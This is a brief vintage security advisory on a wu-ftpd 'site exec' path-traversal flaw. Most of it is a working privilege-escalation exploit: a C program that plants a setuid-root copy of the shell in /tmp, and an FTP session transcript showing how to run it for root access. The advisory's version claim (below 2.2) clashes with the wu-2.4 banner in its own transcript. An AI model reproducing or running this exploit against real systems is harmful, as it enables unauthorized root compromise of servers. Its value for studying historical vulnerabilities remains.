COMMAND

    wu-ftpd

SYSTEMS AFFECTED

    Systems running wu-ftpd below v2.2

PROBLEM

    WUarchive's ftpd  versions below  2.2 have  a vulnerability  where
    you can  execute any   binary you  can see  with the  'site  exec'
    command by  calling  it   with  a relative pathname with "../"  at
    the beginning. Here is a sample exploit.

    Compile this program in yer dir: cc -o ftpbug ftpbug.c

	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>

	main()
	{
	   seteuid(0);
	   system("cp /bin/sh /tmp/.sh");
	   system("chmod 6777 /tmp/.sh");
	}

    Login to the system via ftp:

	220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)
	ready.
	Name (exploitablesys:root): goodaccount
	331 Password required for goodaccount.
	Password: (password)
	230 User goodaccount logged in.
	Remote system type is UNIX.
	Using binary mode to transfer files.
	ftp> quote "site exec bash -c id"      (see if sys is exploitable)
	200-bash -c id
	200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
	200  (end of 'bash -c id')
	ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
	200-bash -c /yer/home/dir/ftpbug
	200  (end of 'bash -c /yer/home/dir/ftpbug')
	ftp> quit
	221 Goodbye.

    Now you have a suid root shell in /tmp/.sh
    Credit for this exploit goes to StaTiC  (statik@free.org)

SOLUTION

    Get newer release of wu-ftpd.